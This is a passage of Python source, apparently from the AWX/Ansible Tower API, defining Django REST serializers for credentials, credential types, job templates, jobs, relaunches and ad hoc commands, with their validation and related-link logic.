format_team_role_perm(naive_team_role, permissive_role_ids):\n ret = []\n team_role = naive_team_role\n if naive_team_role.role_field == 'admin_role':\n team_role = naive_team_role.content_object.member_role\n for role in team_role.children.filter(id__in=permissive_role_ids).all():\n role_dict = {\n 'id': role.id,\n 'name': role.name,\n 'description': role.description,\n 'team_id': team_role.object_id,\n 'team_name': team_role.content_object.name,\n 'team_organization_name': team_role.content_object.organization.name,\n }\n if role.content_type is not None:\n role_dict['resource_name'] = role.content_object.name\n role_dict['resource_type'] = get_type_for_model(role.content_type.model_class())\n role_dict['related'] = reverse_gfk(role.content_object, self.context.get('request'))\n role_dict['user_capabilities'] = {'unattach': requesting_user.can_access(\n Role, 'unattach', role, team_role, 'parents', data={}, skip_sub_obj_read_check=False)}\n else:\n # Singleton roles should not be managed from this view, as per copy/edit rework spec\n role_dict['user_capabilities'] = {'unattach': False}\n ret.append({ 'role': role_dict, 'descendant_roles': get_roles_on_resource(obj, team_role)})\n return ret\n\n team_content_type = ContentType.objects.get_for_model(Team)\n content_type = ContentType.objects.get_for_model(obj)\n\n direct_permissive_role_ids = Role.objects.filter(content_type=content_type, object_id=obj.id).values_list('id', flat=True)\n all_permissive_role_ids = Role.objects.filter(content_type=content_type, object_id=obj.id).values_list('ancestors__id', flat=True)\n\n direct_access_roles = user.roles \\\n .filter(id__in=direct_permissive_role_ids).all()\n\n direct_team_roles = Role.objects \\\n .filter(content_type=team_content_type,\n members=user,\n children__in=direct_permissive_role_ids)\n if content_type == team_content_type:\n # When looking at the access list for a team, exclude the entries\n # for that team. 
This exists primarily so we don't list the read role\n # as a direct role when a user is a member or admin of a team\n direct_team_roles = direct_team_roles.exclude(\n children__content_type=team_content_type,\n children__object_id=obj.id\n )\n\n\n indirect_team_roles = Role.objects \\\n .filter(content_type=team_content_type,\n members=user,\n children__in=all_permissive_role_ids) \\\n .exclude(id__in=direct_team_roles)\n\n indirect_access_roles = user.roles \\\n .filter(id__in=all_permissive_role_ids) \\\n .exclude(id__in=direct_permissive_role_ids) \\\n .exclude(id__in=direct_team_roles) \\\n .exclude(id__in=indirect_team_roles)\n\n ret['summary_fields']['direct_access'] \\\n = [format_role_perm(r) for r in direct_access_roles.distinct()] \\\n + [y for x in (format_team_role_perm(r, direct_permissive_role_ids) for r in direct_team_roles.distinct()) for y in x] \\\n + [y for x in (format_team_role_perm(r, all_permissive_role_ids) for r in indirect_team_roles.distinct()) for y in x]\n\n ret['summary_fields']['indirect_access'] \\\n = [format_role_perm(r) for r in indirect_access_roles.distinct()]\n\n return ret\n\n\nclass CredentialTypeSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete']\n managed_by_tower = serializers.ReadOnlyField()\n\n class Meta:\n model = CredentialType\n fields = ('*', 'kind', 'namespace', 'name', 'managed_by_tower', 'inputs',\n 'injectors')\n\n def validate(self, attrs):\n if self.instance and self.instance.managed_by_tower:\n raise PermissionDenied(\n detail=_(\"Modifications not allowed for managed credential types\")\n )\n if self.instance and self.instance.credentials.exists():\n if 'inputs' in attrs and attrs['inputs'] != self.instance.inputs:\n raise PermissionDenied(\n detail= _(\"Modifications to inputs are not allowed for credential types that are in use\")\n )\n ret = super(CredentialTypeSerializer, self).validate(attrs)\n\n if 'kind' in attrs and attrs['kind'] not in ('cloud', 'net'):\n raise serializers.ValidationError({\n \"kind\": _(\"Must be 'cloud' or 'net', not %s\") % attrs['kind']\n })\n\n fields = attrs.get('inputs', {}).get('fields', [])\n for field in fields:\n if field.get('ask_at_runtime', False):\n raise serializers.ValidationError({\"inputs\": _(\"'ask_at_runtime' is not supported for custom credentials.\")})\n\n return ret\n\n def get_related(self, obj):\n res = super(CredentialTypeSerializer, self).get_related(obj)\n res['credentials'] = self.reverse(\n 'api:credential_type_credential_list',\n kwargs={'pk': obj.pk}\n )\n res['activity_stream'] = self.reverse(\n 'api:credential_type_activity_stream_list',\n kwargs={'pk': obj.pk}\n )\n return res\n\n def to_representation(self, data):\n value = super(CredentialTypeSerializer, self).to_representation(data)\n\n # translate labels and help_text for credential fields \"managed by Tower\"\n if value.get('managed_by_tower'):\n value['name'] = _(value['name'])\n for field in value.get('inputs', {}).get('fields', []):\n field['label'] = _(field['label'])\n if 'help_text' in field:\n field['help_text'] = _(field['help_text'])\n return value\n\n def filter_field_metadata(self, fields, method):\n # API-created/modified CredentialType kinds are limited to\n # `cloud` and `net`\n if method in ('PUT', 'POST'):\n fields['kind']['choices'] = list(filter(\n lambda choice: choice[0] in ('cloud', 'net'),\n fields['kind']['choices']\n ))\n return fields\n\n\nclass CredentialSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete', 'copy', 'use']\n capabilities_prefetch = ['admin', 
'use']\n\n class Meta:\n model = Credential\n fields = ('*', 'organization', 'credential_type', 'inputs', 'kind', 'cloud')\n extra_kwargs = {\n 'credential_type': {\n 'label': _('Credential Type'),\n },\n }\n\n def to_representation(self, data):\n value = super(CredentialSerializer, self).to_representation(data)\n\n if 'inputs' in value:\n value['inputs'] = data.display_inputs()\n return value\n\n def get_related(self, obj):\n res = super(CredentialSerializer, self).get_related(obj)\n\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n\n res.update(dict(\n activity_stream = self.reverse('api:credential_activity_stream_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:credential_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:credential_object_roles_list', kwargs={'pk': obj.pk}),\n owner_users = self.reverse('api:credential_owner_users_list', kwargs={'pk': obj.pk}),\n owner_teams = self.reverse('api:credential_owner_teams_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:credential_copy', kwargs={'pk': obj.pk}),\n input_sources = self.reverse('api:credential_input_source_sublist', kwargs={'pk': obj.pk}),\n credential_type = self.reverse('api:credential_type_detail', kwargs={'pk': obj.credential_type.pk}),\n ))\n\n parents = [role for role in obj.admin_role.parents.all() if role.object_id is not None]\n if parents:\n res.update({parents[0].content_type.name:parents[0].content_object.get_absolute_url(self.context.get('request'))})\n elif len(obj.admin_role.members.all()) > 0:\n user = obj.admin_role.members.all()[0]\n res.update({'user': self.reverse('api:user_detail', kwargs={'pk': user.pk})})\n\n return res\n\n def get_summary_fields(self, obj):\n summary_dict = super(CredentialSerializer, self).get_summary_fields(obj)\n summary_dict['owners'] = []\n\n for user in obj.admin_role.members.all():\n summary_dict['owners'].append({\n 'id': user.pk,\n 'type': 'user',\n 'name': user.username,\n 'description': ' '.join([user.first_name, user.last_name]),\n 'url': self.reverse('api:user_detail', kwargs={'pk': user.pk}),\n })\n\n for parent in [role for role in obj.admin_role.parents.all() if role.object_id is not None]:\n summary_dict['owners'].append({\n 'id': parent.content_object.pk,\n 'type': camelcase_to_underscore(parent.content_object.__class__.__name__),\n 'name': parent.content_object.name,\n 'description': parent.content_object.description,\n 'url': parent.content_object.get_absolute_url(self.context.get('request')),\n })\n\n return summary_dict\n\n def get_validation_exclusions(self, obj=None):\n ret = super(CredentialSerializer, self).get_validation_exclusions(obj)\n for field in ('credential_type', 'inputs'):\n if field in ret:\n ret.remove(field)\n return ret\n\n def validate_credential_type(self, credential_type):\n if self.instance and credential_type.pk != self.instance.credential_type.pk:\n for rel in (\n 'ad_hoc_commands',\n 'insights_inventories',\n 'unifiedjobs',\n 'unifiedjobtemplates',\n 'projects',\n 'projectupdates',\n 'workflowjobnodes'\n ):\n if getattr(self.instance, rel).count() > 0:\n raise ValidationError(\n _('You cannot change the credential type of the credential, as it may break the functionality'\n ' of the resources using it.'),\n )\n\n return credential_type\n\n\nclass CredentialSerializerCreate(CredentialSerializer):\n\n user = serializers.PrimaryKeyRelatedField(\n queryset=User.objects.all(),\n required=False, default=None, write_only=True, 
allow_null=True,\n help_text=_('Write-only field used to add user to owner role. If provided, '\n 'do not give either team or organization. Only valid for creation.'))\n team = serializers.PrimaryKeyRelatedField(\n queryset=Team.objects.all(),\n required=False, default=None, write_only=True, allow_null=True,\n help_text=_('Write-only field used to add team to owner role. If provided, '\n 'do not give either user or organization. Only valid for creation.'))\n organization = serializers.PrimaryKeyRelatedField(\n queryset=Organization.objects.all(),\n required=False, default=None, allow_null=True,\n help_text=_('Inherit permissions from organization roles. If provided on creation, '\n 'do not give either user or team.'))\n\n class Meta:\n model = Credential\n fields = ('*', 'user', 'team')\n\n def validate(self, attrs):\n owner_fields = set()\n for field in ('user', 'team', 'organization'):\n if field in attrs:\n if attrs[field]:\n owner_fields.add(field)\n else:\n attrs.pop(field)\n if not owner_fields:\n raise serializers.ValidationError({\"detail\": _(\"Missing 'user', 'team', or 'organization'.\")})\n\n if attrs.get('team'):\n attrs['organization'] = attrs['team'].organization\n\n return super(CredentialSerializerCreate, self).validate(attrs)\n\n def create(self, validated_data):\n user = validated_data.pop('user', None)\n team = validated_data.pop('team', None)\n\n credential = super(CredentialSerializerCreate, self).create(validated_data)\n\n if user:\n credential.admin_role.members.add(user)\n if team:\n if not credential.organization or team.organization.id != credential.organization.id:\n raise serializers.ValidationError({\"detail\": _(\"Credential organization must be set and match before assigning to a team\")})\n credential.admin_role.parents.add(team.admin_role)\n credential.use_role.parents.add(team.member_role)\n return credential\n\n\nclass CredentialInputSourceSerializer(BaseSerializer):\n show_capabilities = ['delete']\n\n class Meta:\n model = CredentialInputSource\n fields = (\n '*',\n 'input_field_name',\n 'metadata',\n 'target_credential',\n 'source_credential',\n '-name',\n )\n extra_kwargs = {\n 'input_field_name': {'required': True},\n 'target_credential': {'required': True},\n 'source_credential': {'required': True},\n }\n\n def get_related(self, obj):\n res = super(CredentialInputSourceSerializer, self).get_related(obj)\n res['source_credential'] = obj.source_credential.get_absolute_url(request=self.context.get('request'))\n res['target_credential'] = obj.target_credential.get_absolute_url(request=self.context.get('request'))\n return res\n\n\nclass UserCredentialSerializerCreate(CredentialSerializerCreate):\n\n class Meta:\n model = Credential\n fields = ('*', '-team', '-organization')\n\n\nclass TeamCredentialSerializerCreate(CredentialSerializerCreate):\n\n class Meta:\n model = Credential\n fields = ('*', '-user', '-organization')\n\n\nclass OrganizationCredentialSerializerCreate(CredentialSerializerCreate):\n\n class Meta:\n model = Credential\n fields = ('*', '-user', '-team')\n\n\nclass LabelsListMixin(object):\n\n def _summary_field_labels(self, obj):\n label_list = [{'id': x.id, 'name': x.name} for x in obj.labels.all()[:10]]\n if has_model_field_prefetched(obj, 'labels'):\n label_ct = len(obj.labels.all())\n else:\n if len(label_list) < 10:\n label_ct = len(label_list)\n else:\n label_ct = obj.labels.count()\n return {'count': label_ct, 'results': label_list}\n\n def get_summary_fields(self, obj):\n res = super(LabelsListMixin, 
self).get_summary_fields(obj)\n res['labels'] = self._summary_field_labels(obj)\n return res\n\n\nclass JobOptionsSerializer(LabelsListMixin, BaseSerializer):\n\n class Meta:\n fields = ('*', 'job_type', 'inventory', 'project', 'playbook',\n 'forks', 'limit', 'verbosity', 'extra_vars', 'job_tags',\n 'force_handlers', 'skip_tags', 'start_at_task', 'timeout',\n 'use_fact_cache',)\n\n def get_related(self, obj):\n res = super(JobOptionsSerializer, self).get_related(obj)\n res['labels'] = self.reverse('api:job_template_label_list', kwargs={'pk': obj.pk})\n try:\n if obj.inventory:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory.pk})\n except ObjectDoesNotExist:\n setattr(obj, 'inventory', None)\n try:\n if obj.project:\n res['project'] = self.reverse('api:project_detail', kwargs={'pk': obj.project.pk})\n except ObjectDoesNotExist:\n setattr(obj, 'project', None)\n if isinstance(obj, UnifiedJobTemplate):\n res['extra_credentials'] = self.reverse(\n 'api:job_template_extra_credentials_list',\n kwargs={'pk': obj.pk}\n )\n res['credentials'] = self.reverse(\n 'api:job_template_credentials_list',\n kwargs={'pk': obj.pk}\n )\n elif isinstance(obj, UnifiedJob):\n res['extra_credentials'] = self.reverse('api:job_extra_credentials_list', kwargs={'pk': obj.pk})\n res['credentials'] = self.reverse('api:job_credentials_list', kwargs={'pk': obj.pk})\n\n return res\n\n def to_representation(self, obj):\n ret = super(JobOptionsSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'inventory' in ret and not obj.inventory:\n ret['inventory'] = None\n if 'project' in ret and not obj.project:\n ret['project'] = None\n if 'playbook' in ret:\n ret['playbook'] = ''\n return ret\n\n def validate(self, attrs):\n if 'project' in self.fields and 'playbook' in self.fields:\n project = attrs.get('project', self.instance and self.instance.project or None)\n playbook = attrs.get('playbook', self.instance and self.instance.playbook or '')\n if not project:\n raise serializers.ValidationError({'project': _('This field is required.')})\n if project and project.scm_type and playbook and force_text(playbook) not in project.playbook_files:\n raise serializers.ValidationError({'playbook': _('Playbook not found for project.')})\n if project and not project.scm_type and playbook and force_text(playbook) not in project.playbooks:\n raise serializers.ValidationError({'playbook': _('Playbook not found for project.')})\n if project and not playbook:\n raise serializers.ValidationError({'playbook': _('Must select playbook for project.')})\n\n ret = super(JobOptionsSerializer, self).validate(attrs)\n return ret\n\n\nclass JobTemplateMixin(object):\n '''\n Provide recent jobs and survey details in summary_fields\n '''\n\n def _recent_jobs(self, obj):\n # Exclude \"joblets\", jobs that ran as part of a sliced workflow job\n uj_qs = obj.unifiedjob_unified_jobs.exclude(job__job_slice_count__gt=1).order_by('-created')\n # Would like to apply an .only, but does not play well with non_polymorphic\n # .only('id', 'status', 'finished', 'polymorphic_ctype_id')\n optimized_qs = uj_qs.non_polymorphic()\n return [{\n 'id': x.id, 'status': x.status, 'finished': x.finished,\n # Make type consistent with API top-level key, for instance workflow_job\n 'type': x.get_real_instance_class()._meta.verbose_name.replace(' ', '_')\n } for x in optimized_qs[:10]]\n\n def get_summary_fields(self, obj):\n d = super(JobTemplateMixin, self).get_summary_fields(obj)\n if obj.survey_spec is not None and 
('name' in obj.survey_spec and 'description' in obj.survey_spec):\n d['survey'] = dict(title=obj.survey_spec['name'], description=obj.survey_spec['description'])\n d['recent_jobs'] = self._recent_jobs(obj)\n return d\n\n\nclass JobTemplateSerializer(JobTemplateMixin, UnifiedJobTemplateSerializer, JobOptionsSerializer):\n show_capabilities = ['start', 'schedule', 'copy', 'edit', 'delete']\n capabilities_prefetch = [\n 'admin', 'execute',\n {'copy': ['project.use', 'inventory.use']}\n ]\n\n status = serializers.ChoiceField(choices=JobTemplate.JOB_TEMPLATE_STATUS_CHOICES, read_only=True, required=False)\n\n class Meta:\n model = JobTemplate\n fields = ('*', 'host_config_key', 'ask_diff_mode_on_launch', 'ask_variables_on_launch', 'ask_limit_on_launch', 'ask_tags_on_launch',\n 'ask_skip_tags_on_launch', 'ask_job_type_on_launch', 'ask_verbosity_on_launch', 'ask_inventory_on_launch',\n 'ask_credential_on_launch', 'survey_enabled', 'become_enabled', 'diff_mode',\n 'allow_simultaneous', 'custom_virtualenv', 'job_slice_count')\n\n def get_related(self, obj):\n res = super(JobTemplateSerializer, self).get_related(obj)\n res.update(dict(\n jobs = self.reverse('api:job_template_jobs_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:job_template_schedules_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:job_template_activity_stream_list', kwargs={'pk': obj.pk}),\n launch = self.reverse('api:job_template_launch', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:job_template_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:job_template_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:job_template_notification_templates_error_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:job_template_access_list', kwargs={'pk': obj.pk}),\n survey_spec = self.reverse('api:job_template_survey_spec', kwargs={'pk': obj.pk}),\n labels = self.reverse('api:job_template_label_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:job_template_object_roles_list', kwargs={'pk': obj.pk}),\n instance_groups = self.reverse('api:job_template_instance_groups_list', kwargs={'pk': obj.pk}),\n slice_workflow_jobs = self.reverse('api:job_template_slice_workflow_jobs_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:job_template_copy', kwargs={'pk': obj.pk}),\n ))\n if obj.host_config_key:\n res['callback'] = self.reverse('api:job_template_callback', kwargs={'pk': obj.pk})\n return res\n\n def validate(self, attrs):\n def get_field_from_model_or_attrs(fd):\n return attrs.get(fd, self.instance and getattr(self.instance, fd) or None)\n\n inventory = get_field_from_model_or_attrs('inventory')\n project = get_field_from_model_or_attrs('project')\n\n if get_field_from_model_or_attrs('host_config_key') and not inventory:\n raise serializers.ValidationError({'host_config_key': _(\n \"Cannot enable provisioning callback without an inventory set.\"\n )})\n\n prompting_error_message = _(\"Must either set a default value or ask to prompt on launch.\")\n if project is None:\n raise serializers.ValidationError({'project': _(\"Job Templates must have a project assigned.\")})\n elif inventory is None and not get_field_from_model_or_attrs('ask_inventory_on_launch'):\n raise serializers.ValidationError({'inventory': prompting_error_message})\n\n return super(JobTemplateSerializer, self).validate(attrs)\n\n def validate_extra_vars(self, 
value):\n return vars_validate_or_raise(value)\n\n\n def get_summary_fields(self, obj):\n summary_fields = super(JobTemplateSerializer, self).get_summary_fields(obj)\n all_creds = []\n # Organize credential data into multitude of deprecated fields\n extra_creds = []\n if obj.pk:\n for cred in obj.credentials.all():\n summarized_cred = {\n 'id': cred.pk,\n 'name': cred.name,\n 'description': cred.description,\n 'kind': cred.kind,\n 'cloud': cred.credential_type.kind == 'cloud'\n }\n all_creds.append(summarized_cred)\n if cred.credential_type.kind in ('cloud', 'net'):\n extra_creds.append(summarized_cred)\n if self.is_detail_view:\n summary_fields['extra_credentials'] = extra_creds\n summary_fields['credentials'] = all_creds\n return summary_fields\n\n\nclass JobTemplateWithSpecSerializer(JobTemplateSerializer):\n '''\n Used for activity stream entries.\n '''\n\n class Meta:\n model = JobTemplate\n fields = ('*', 'survey_spec')\n\n\nclass JobSerializer(UnifiedJobSerializer, JobOptionsSerializer):\n\n passwords_needed_to_start = serializers.ReadOnlyField()\n artifacts = serializers.SerializerMethodField()\n\n class Meta:\n model = Job\n fields = ('*', 'job_template', 'passwords_needed_to_start',\n 'allow_simultaneous', 'artifacts', 'scm_revision',\n 'instance_group', 'diff_mode', 'job_slice_number', 'job_slice_count')\n\n def get_related(self, obj):\n res = super(JobSerializer, self).get_related(obj)\n res.update(dict(\n job_events = self.reverse('api:job_job_events_list', kwargs={'pk': obj.pk}),\n job_host_summaries = self.reverse('api:job_job_host_summaries_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:job_activity_stream_list', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:job_notifications_list', kwargs={'pk': obj.pk}),\n labels = self.reverse('api:job_label_list', kwargs={'pk': obj.pk}),\n create_schedule = self.reverse('api:job_create_schedule', kwargs={'pk': obj.pk}),\n ))\n try:\n if obj.job_template:\n res['job_template'] = self.reverse('api:job_template_detail',\n kwargs={'pk': obj.job_template.pk})\n except ObjectDoesNotExist:\n setattr(obj, 'job_template', None)\n if obj.can_cancel or True:\n res['cancel'] = self.reverse('api:job_cancel', kwargs={'pk': obj.pk})\n try:\n if obj.project_update:\n res['project_update'] = self.reverse(\n 'api:project_update_detail', kwargs={'pk': obj.project_update.pk}\n )\n except ObjectDoesNotExist:\n pass\n res['relaunch'] = self.reverse('api:job_relaunch', kwargs={'pk': obj.pk})\n return res\n\n def get_artifacts(self, obj):\n if obj:\n return obj.display_artifacts()\n return {}\n\n def to_internal_value(self, data):\n # When creating a new job and a job template is specified, populate any\n # fields not provided in data from the job template.\n if not self.instance and isinstance(data, dict) and data.get('job_template', False):\n try:\n job_template = JobTemplate.objects.get(pk=data['job_template'])\n except JobTemplate.DoesNotExist:\n raise serializers.ValidationError({'job_template': _('Invalid job template.')})\n data.setdefault('name', job_template.name)\n data.setdefault('description', job_template.description)\n data.setdefault('job_type', job_template.job_type)\n if job_template.inventory:\n data.setdefault('inventory', job_template.inventory.pk)\n if job_template.project:\n data.setdefault('project', job_template.project.pk)\n data.setdefault('playbook', job_template.playbook)\n if job_template.credential:\n data.setdefault('credential', job_template.credential)\n data.setdefault('forks', 
job_template.forks)\n data.setdefault('limit', job_template.limit)\n data.setdefault('verbosity', job_template.verbosity)\n data.setdefault('extra_vars', job_template.extra_vars)\n data.setdefault('job_tags', job_template.job_tags)\n data.setdefault('force_handlers', job_template.force_handlers)\n data.setdefault('skip_tags', job_template.skip_tags)\n data.setdefault('start_at_task', job_template.start_at_task)\n return super(JobSerializer, self).to_internal_value(data)\n\n def to_representation(self, obj):\n ret = super(JobSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'job_template' in ret and not obj.job_template:\n ret['job_template'] = None\n if 'extra_vars' in ret:\n ret['extra_vars'] = obj.display_extra_vars()\n return ret\n\n def get_summary_fields(self, obj):\n summary_fields = super(JobSerializer, self).get_summary_fields(obj)\n all_creds = []\n # Organize credential data into multitude of deprecated fields\n extra_creds = []\n if obj.pk:\n for cred in obj.credentials.all():\n summarized_cred = {\n 'id': cred.pk,\n 'name': cred.name,\n 'description': cred.description,\n 'kind': cred.kind,\n 'cloud': cred.credential_type.kind == 'cloud'\n }\n all_creds.append(summarized_cred)\n if cred.credential_type.kind in ('cloud', 'net'):\n extra_creds.append(summarized_cred)\n if self.is_detail_view:\n summary_fields['extra_credentials'] = extra_creds\n summary_fields['credentials'] = all_creds\n return summary_fields\n\n\nclass JobDetailSerializer(JobSerializer):\n\n host_status_counts = serializers.SerializerMethodField(\n help_text=_('A count of hosts uniquely assigned to each status.'),\n )\n playbook_counts = serializers.SerializerMethodField(\n help_text=_('A count of all plays and tasks for the job run.'),\n )\n custom_virtualenv = serializers.ReadOnlyField()\n\n class Meta:\n model = Job\n fields = ('*', 'host_status_counts', 'playbook_counts', 'custom_virtualenv')\n\n def get_playbook_counts(self, obj):\n task_count = obj.job_events.filter(event='playbook_on_task_start').count()\n play_count = obj.job_events.filter(event='playbook_on_play_start').count()\n\n data = {'play_count': play_count, 'task_count': task_count}\n\n return data\n\n def get_host_status_counts(self, obj):\n try:\n counts = obj.job_events.only('event_data').get(event='playbook_on_stats').get_host_status_counts()\n except JobEvent.DoesNotExist:\n counts = {}\n\n return counts\n\n\nclass JobCancelSerializer(BaseSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n model = Job\n fields = ('can_cancel',)\n\n\nclass JobRelaunchSerializer(BaseSerializer):\n\n passwords_needed_to_start = serializers.SerializerMethodField()\n retry_counts = serializers.SerializerMethodField()\n hosts = serializers.ChoiceField(\n required=False, allow_null=True, default='all',\n choices=[\n ('all', _('No change to job limit')),\n ('failed', _('All failed and unreachable hosts'))\n ],\n write_only=True\n )\n credential_passwords = VerbatimField(required=True, write_only=True)\n\n class Meta:\n model = Job\n fields = ('passwords_needed_to_start', 'retry_counts', 'hosts', 'credential_passwords',)\n\n def validate_credential_passwords(self, value):\n pnts = self.instance.passwords_needed_to_start\n missing = set(pnts) - set(key for key in value if value[key])\n if missing:\n raise serializers.ValidationError(_(\n 'Missing passwords needed to start: {}'.format(', '.join(missing))\n ))\n return value\n\n def to_representation(self, obj):\n res = super(JobRelaunchSerializer, 
self).to_representation(obj)\n view = self.context.get('view', None)\n if hasattr(view, '_raw_data_form_marker'):\n password_keys = dict([(p, u'') for p in self.get_passwords_needed_to_start(obj)])\n res.update(password_keys)\n return res\n\n def get_passwords_needed_to_start(self, obj):\n if obj:\n return obj.passwords_needed_to_start\n return ''\n\n def get_retry_counts(self, obj):\n if obj.status in ACTIVE_STATES:\n return _('Relaunch by host status not available until job finishes running.')\n data = OrderedDict([])\n for status in self.fields['hosts'].choices.keys():\n data[status] = obj.retry_qs(status).count()\n return data\n\n def get_validation_exclusions(self, *args, **kwargs):\n r = super(JobRelaunchSerializer, self).get_validation_exclusions(*args, **kwargs)\n r.append('credential_passwords')\n return r\n\n def validate(self, attrs):\n obj = self.instance\n if obj.project is None:\n raise serializers.ValidationError(dict(errors=[_(\"Job Template Project is missing or undefined.\")]))\n if obj.inventory is None or obj.inventory.pending_deletion:\n raise serializers.ValidationError(dict(errors=[_(\"Job Template Inventory is missing or undefined.\")]))\n attrs = super(JobRelaunchSerializer, self).validate(attrs)\n return attrs\n\n\nclass JobCreateScheduleSerializer(BaseSerializer):\n\n can_schedule = serializers.SerializerMethodField()\n prompts = serializers.SerializerMethodField()\n\n class Meta:\n model = Job\n fields = ('can_schedule', 'prompts',)\n\n def get_can_schedule(self, obj):\n '''\n Need both a job template and job prompts to schedule\n '''\n return obj.can_schedule\n\n @staticmethod\n def _summarize(res_name, obj):\n summary = {}\n for field in SUMMARIZABLE_FK_FIELDS[res_name]:\n summary[field] = getattr(obj, field, None)\n return summary\n\n def get_prompts(self, obj):\n try:\n config = obj.launch_config\n ret = config.prompts_dict(display=True)\n if 'inventory' in ret:\n ret['inventory'] = self._summarize('inventory', ret['inventory'])\n if 'credentials' in ret:\n all_creds = [self._summarize('credential', cred) for cred in ret['credentials']]\n ret['credentials'] = all_creds\n return ret\n except JobLaunchConfig.DoesNotExist:\n return {'all': _('Unknown, job may have been ran before launch configurations were saved.')}\n\n\nclass AdHocCommandSerializer(UnifiedJobSerializer):\n\n class Meta:\n model = AdHocCommand\n fields = ('*', 'job_type', 'inventory', 'limit', 'credential',\n 'module_name', 'module_args', 'forks', 'verbosity', 'extra_vars',\n 'become_enabled', 'diff_mode', '-unified_job_template', '-description')\n extra_kwargs = {\n 'name': {\n 'read_only': True,\n },\n }\n\n def get_field_names(self, declared_fields, info):\n field_names = super(AdHocCommandSerializer, self).get_field_names(declared_fields, info)\n # Meta multiple inheritance and -field_name options don't seem to be\n # taking effect above, so remove the undesired fields here.\n return tuple(x for x in field_names if x not in ('unified_job_template', 'description'))\n\n def build_standard_field(self, field_name, model_field):\n field_class, field_kwargs = super(AdHocCommandSerializer, self).build_standard_field(field_name, model_field)\n # Load module name choices dynamically from DB settings.\n if field_name == 'module_name':\n field_class = serializers.ChoiceField\n module_name_choices = [(x, x) for x in settings.AD_HOC_COMMANDS]\n module_name_default = 'command' if 'command' in [x[0] for x in module_name_choices] else ''\n field_kwargs['choices'] = module_name_choices\n 
field_kwargs['required'] = bool(not module_name_default)\n field_kwargs['default'] = module_name_default or serializers.empty\n field_kwargs['allow_blank'] = bool(module_name_default)\n field_kwargs.pop('max_length', None)\n return field_class, field_kwargs\n\n def get_related(self, obj):\n res = super(AdHocCommandSerializer, self).get_related(obj)\n if obj.inventory_id:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory_id})\n if obj.credential_id:\n res['credential'] = self.reverse('api:credential_detail', kwargs={'pk': obj.credential_id})\n res.update(dict(\n events = self.reverse('api:ad_hoc_command_ad_hoc_command_events_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:ad_hoc_command_activity_stream_list', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:ad_hoc_command_notifications_list', kwargs={'pk': obj.pk}),\n ))\n res['cancel'] = self.reverse('api:ad_hoc_command_cancel', kwargs={'pk': obj.pk})\n res['relaunch'] = self.reverse('api:ad_hoc_command_relaunch', kwargs={'pk': obj.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(AdHocCommandSerializer, self).to_representation(obj)\n if 'inventory' in ret and not obj.inventory_id:\n ret['inventory'] = None\n if 'credential' in ret and not obj.credential_id:\n ret['credential'] = None\n # For the UI, only module_name is returned for name, instead of the\n # longer module name + module_args format.\n if 'name' in ret:\n ret['name'] = obj.module_name\n return ret\n\n def validate(self, attrs):\n ret = super(AdHocCommandSerializer, self).validate(attrs)\n return ret\n\n def validate_extra_vars(self, value):\n redacted_extra_vars, removed_vars = extract_ansible_vars(value)\n if removed_vars:\n raise serializers.ValidationError(_(\n \"{} are prohibited from use in ad hoc commands.\"\n ).format(\", \".join(sorted(removed_vars, reverse=True))))\n return vars_validate_or_raise(value)\n\n\nclass AdHocCommandDetailSerializer(AdHocCommandSerializer):\n\n host_status_counts = serializers.SerializerMethodField(\n help_text=_('A count of hosts uniquely assigned to each status.'),\n )\n\n class Meta:\n model = AdHocCommand\n fields = ('*', 'host_status_counts',)\n\n def get_host_status_counts(self, obj):\n try:\n counts = obj.ad_hoc_command_events.only('event_data').get(event='playbook_on_stats').get_host_status_counts()\n except AdHocCommandEvent.DoesNotExist:\n counts = {}\n\n return counts\n\n\nclass AdHocCommandCancelSerializer(AdHocCommandSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass AdHocCommandRelaunchSerializer(AdHocCommandSerializer):\n\n class Meta:\n fields = ()\n\n def to_representation(self, obj):\n if obj:\n return dict([(p, u'') for p in obj.passwords_needed_to_start])\n else:\n return {}\n\n\nclass SystemJobTemplateSerializer(UnifiedJobTemplateSerializer):\n\n class Meta:\n model = SystemJobTemplate\n fields = ('*', 'job_type',)\n\n def get_related(self, obj):\n res = super(SystemJobTemplateSerializer, self).get_related(obj)\n res.update(dict(\n jobs = self.reverse('api:system_job_template_jobs_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:system_job_template_schedules_list', kwargs={'pk': obj.pk}),\n launch = self.reverse('api:system_job_template_launch', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:system_job_template_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = 
